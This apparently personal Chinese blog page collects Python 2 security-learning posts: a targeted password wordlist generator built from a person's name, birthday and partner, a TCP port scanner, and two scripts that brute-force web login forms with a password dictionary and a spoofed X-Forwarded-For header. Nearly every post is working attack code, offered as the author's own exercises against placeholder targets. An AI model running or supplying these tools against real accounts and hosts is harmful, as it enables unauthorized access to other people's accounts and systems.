分类 python 下的文章

社工密码生成

看了大量报告就知道一个短小精悍的字典有多重要。
本来想写根据键盘布局设置的密码字典的,类似

  • qwerty

  • qwer1234

  • q1w2e3r4

  • qazwsx

  • qwer!@#

  • asdf8888

  • ......
    CSDN_TOP_5K来看,这种根据键盘布局设置的密码应该是最高频的一类密码,至少在程序猿界是这样的。

但是这种密码太灵活了,没写出来,只好写了个简单的。
只写了两种属性组合方式,生日+密码和配偶+关键词,以后再添加有用的组合。

#! /usr/bin/env python
# coding: utf-8
'''
社工字典生成
date: 2017/6/17
'''
import string

global pwdList
pwdList = []

# 目标属性
class Person:
    NAME = "han tie gun"
    BIRTHDAY = "1926 08 17"
    PARTNER = 'wang gang dan'
    LOVE_KEYS = ['520', '1314', '5201314', '1314520', '2920184', 'love']
    SYMBOL = ['!', '@', '#', '_', '-', ',', '.', '!@#', '$%^']

# 属性拓展
def get_name(name):
    nameList = []
    nameList.append(string.capwords(name).replace(' ', ''))     # 声母大写
    nameList.append(name.capitalize().replace(' ', ''))     # 首字母大写
    nameList.append(''.join(name.split()[0:1]))    # 姓
    nameList.append(''.join(name.split()[0:1]).capitalize())    # 姓首字母大写
    nameList.append(''.join(name.split()[1:]))  # 名
    jianping = [one[0:1] for one in name.split(' ')]    # 简拼
    jianping = ''.join(jianping)
    nameList.append(jianping)
    nameList.append(jianping.upper())
    return nameList

def get_birthday(day):
    dayList = []
    dayList.append(day.replace(' ', ''))    # 年月日
    dayList.append(day.replace(' ', '')[0:6])   # 年月
    dayList.append(day.replace(' ', '')[4:])    # 月日
    dayList.append(day.replace(' ', '')[0:4])   # 年
    return dayList

def get_partner(partner):
    partnerList = get_name(partner)
    return partnerList

def get_lovekeys(keys):
    lovekeysList = keys
    return lovekeysList

def get_symbol(symbols):
    return symbols

nameList = get_name(Person.NAME)
birthdayList = get_birthday(Person.BIRTHDAY)
partnerList = get_partner(Person.PARTNER)
lovekeys = get_lovekeys(Person.LOVE_KEYS)
symbolList = get_symbol(Person.SYMBOL)

# 属性组合
# 姓名+生日组合
def name_birthday(nameList, birthdayList, symbolList):
    pwdList.extend(nameList)
    pwdList.extend(birthdayList)
    for name in nameList:
        for day in birthdayList:
            for symbol in symbolList:
                pwdList.append(name + day)
                pwdList.append(day + name)
                pwdList.append(name + symbol + day)
                pwdList.append(day + symbol + day)

# 配偶+lovekey组合
def partner_lovekey(partnerList, lovekeys, symbolList):
    for partner in partnerList:
        for love in lovekeys:
            for symbol in symbolList:
                pwdList.append(partner + love)
                pwdList.append(love + partner)
                pwdList.append(partner + symbol + love)
                pwdList.append(love + symbol + partner)

def savefile(pwdList):
    filename = "result.txt"
    with open(filename, "w+") as f:
        for line in pwdList:
            f.write(line + '\n')
    print "\r\n[*] Generated %d lines" % len(pwdList)
    print "[*] The results saved as %s" % filename
if __name__ == '__main__':
    name_birthday(nameList, birthdayList, symbolList)
    partner_lovekey(partnerList, lovekeys, symbolList)
    pwdList = list(set(pwdList))
    savefile(pwdList)

1.png

最近又刚发发现某大佬写的利器,感觉应该很好用,基本上我想要的功能都有,伏地膜-。-

python端口扫描器

学习python网络编程,写了个tcp的端口扫描,单线程,仅仅为了学习而已。

#! /usr/bin/env python
# coding:utf-8
# 端口扫描
import argparse
import socket
import time

def scan(ip, port):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.setdefaulttimeout(3)
        status = s.connect_ex((ip, port))
        return status
    except:
        return

def scanport():
    start_time = time.time()
    print u"开放的端口: "
    for port in range(start_port, end_port+1):
        status = scan(target_ip, port)
        if status == 0:
            print "* %s --- open" % str(port)
    print u"扫描结束,耗时: %s s." % (time.time() - start_time)
if __name__ == "__main__":
    parse = argparse.ArgumentParser()
    parse.add_argument("host", action="store", help="The target host")
    parse.add_argument("start", action="store", help="The start port")
    parse.add_argument("end", action="store", help="The end port")
    args = parse.parse_args()

    target_ip = socket.gethostbyname(args.host)
    start_port = int(args.start)
    end_port = int(args.end)

    scanport()

登陆表单破解2

#! /usr/bin/env python
# coding:utf-8
'''
暴力破解登陆表单
date: 2017/3/13
参数: 脚本名 登陆地址 用户名 密码字典 登陆失败特征字符
'''
import requests, sys
if len(sys.argv) != 5:
    print u'''
    Usage: brute.py http:127.0.0.1/login.php admin pwd.txt failed
    '''
    sys.exit()

url = sys.argv[1]
username = sys.argv[2]
pwdPtah = sys.argv[3]
identify = sys.argv[4]

for password in open(pwdPtah).readlines():
    password = password.strip('\n')
    data = {
        'user': username,
        'passwd': password
    }
    headers = {
        'UserAgent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3004.3 Safari/537.36',
        'AcceptEncoding': 'gzip, deflate, sdch'
    }
    print u'正在尝试 %s:%s' % (username, password)
    res = requests.post(url, data=data, headers=headers)
    if res.text.find(identify) == -1:
        print u'破解成功,密码为: %s' % password
        break

这次用requests库写的,感觉比Urllib2要方便和强大些

登陆表单破解

#! /usr/bin/env python
# coding:utf-8
'''
登陆表单暴力破解
Date: 2017/3/12
'''
import urllib, urllib2, time

url = 'http://127.0.0.1/login.php'
UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3004.3 Safari/537.36'
xff = '127.0.0.1'
AcceptEncoding = 'gzip, deflate, sdch'

username = 'admin'
pwdPath = 'f:\\py_code\\pwd.txt'
identify = 'failed'    # 登录失败特征

def getPwdList(pwdPath):
    # 构建字典列表
    try:
        fopen = open(pwdPath)
        pwdList = [x.strip('\n') for x in fopen.readlines()]
        print '字典加载成功,总有%s条密码' % len(pwdList)
        return pwdList
    except Exception, msg:
        print '字典加载错误: %s' % msg

def makeReq(url, UserAgent, xff, AcceptEncoding):
    # 构造Request请求
    req = urllib2.Request(url)
    req.add_header('User-Agent', UserAgent)
    req.add_header('X-Forwarded-For', xff)
    req.add_header('Accept-Encoding', AcceptEncoding)
    return req

def login(req, username, password, identify):
    # 表单登陆
    params = {}
    params['passwd'] = password
    params['user'] = username
    data = urllib.urlencode(params)
    req.add_data(data)
    try:
        res = urllib2.urlopen(req)
        html_text = res.read()
        # print html_text
        if html_text.find(identify) == -1:
            return True
    except Exception, msg:
        print '网页打开错误: %s' % msg
        # print res.read()
        # print res.getcode()
        # print res.geturl()

pwdL = getPwdList(pwdPath)  # 密码字典列表
start_time = time.time()
for password in pwdL:
    req = makeReq(url, UserAgent, xff, AcceptEncoding)
    print '正在尝试 %s:%s' % (username, password)
    login_result = login(req=req, username=username, password=password, identify=identify)
    if login_result == True:
        spent_time = time.time() - start_time
        print '破解成功,密码为: %s ' % password
        print '耗时: %s 秒' % spent_time
        break

遇到的坑:
urllib2.Request对象生成后不要多次open,有大问题,调了一下午的大问题,不知为何,于是只能傻傻的一个open对应一个Request。很坑,调到心态爆炸,下次考虑用requests写了。